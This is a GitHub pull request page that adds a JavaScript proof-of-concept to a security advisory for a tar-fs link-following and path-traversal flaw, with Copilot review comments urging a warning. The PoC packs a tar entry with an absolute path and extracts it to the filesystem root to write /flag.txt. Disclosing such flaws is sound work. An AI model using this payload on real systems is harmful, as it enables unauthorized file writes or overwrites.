[GHSA-pq67-2wwv-3xjx] tar-fs Vulnerable to Link Following and Path Traversal via Extracting a Crafted tar File

[AryazE]

Updates

• Description

Comments
Add PoC exploit

[Copilot]

Pull Request Overview

This PR adds a Proof of Concept (PoC) exploit to a GitHub Security Advisory for a tar-fs vulnerability related to link following and path traversal attacks.

• Adds a JavaScript code example demonstrating how the vulnerability can be exploited
• Updates the modification timestamp to reflect the content change

Comments suppressed due to low confidence (1)

advisories/github-reviewed/2025/03/GHSA-pq67-2wwv-3xjx/GHSA-pq67-2wwv-3xjx.json:1

• The PoC demonstrates extracting to the root directory '/' which could be dangerous if accidentally executed. Consider using a safer example path like './test-extract' or documenting that this is for demonstration purposes only and should not be run in production environments.

{

---

_{Tip: Customize your code reviews with copilot-instructions.md. Create the file or learn how to get started.}

[Copilot]

The PoC attempts to write to '/flag.txt' (absolute path at filesystem root) which demonstrates the path traversal vulnerability but could cause harm if executed. Consider adding a warning comment that this code should only be used for understanding the vulnerability and not executed in real environments.

Suggested change

"details": "An Improper Link Resolution Before File Access (\"Link Following\") and Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\"). This vulnerability occurs when extracting a maliciously crafted tar file, which can result in unauthorized file writes or overwrites outside the intended extraction directory. The issue is associated with index.js in the tar-fs package.\n\n### PoC\n```javascript\n// Create a writable stream to extract the tar content\nconst extractStream = tarfs.extract('/', {\n // We can ignore the file type checks to allow the extraction of the malicious file\n ignore: (name) => false,\n});\n\n// Create a tar stream\nconst tarStream = tarfs.pack().on('error', (err) => {\n throw err;\n});\n\n// Append the malicious entry to the tar stream\ntarStream.entry({ name: '/flag.txt', mode: 0o644 }, Buffer.from('This is a flag!'));\n\n// Finalize the tar stream\ntarStream.finalize();\n\n// Pipe the tar stream into the extract stream\ntarStream.pipe(extractStream);\n```\n\nThis issue affects tar-fs: from 0.0.0 before 1.16.4, from 2.0.0 before 2.1.2, from 3.0.0 before 3.0.7.",

"details": "An Improper Link Resolution Before File Access (\"Link Following\") and Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\"). This vulnerability occurs when extracting a maliciously crafted tar file, which can result in unauthorized file writes or overwrites outside the intended extraction directory. The issue is associated with index.js in the tar-fs package.\n\n### PoC\n```javascript\n// WARNING: This code is for educational purposes only.\n// Do NOT run in production or real environments.\n// Create a writable stream to extract the tar content\nconst extractStream = tarfs.extract('/', {\n // We can ignore the file type checks to allow the extraction of the malicious file\n ignore: (name) => false,\n});\n\n// Create a tar stream\nconst tarStream = tarfs.pack().on('error', (err) => {\n throw err;\n});\n\n// Append the malicious entry to the tar stream\ntarStream.entry({ name: '/flag.txt', mode: 0o644 }, Buffer.from('This is a flag!'));\n\n// Finalize the tar stream\ntarStream.finalize();\n\n// Pipe the tar stream into the extract stream\ntarStream.pipe(extractStream);\n```\n\nThis issue affects tar-fs: from 0.0.0 before 1.16.4, from 2.0.0 before 2.1.2, from 3.0.0 before 3.0.7.",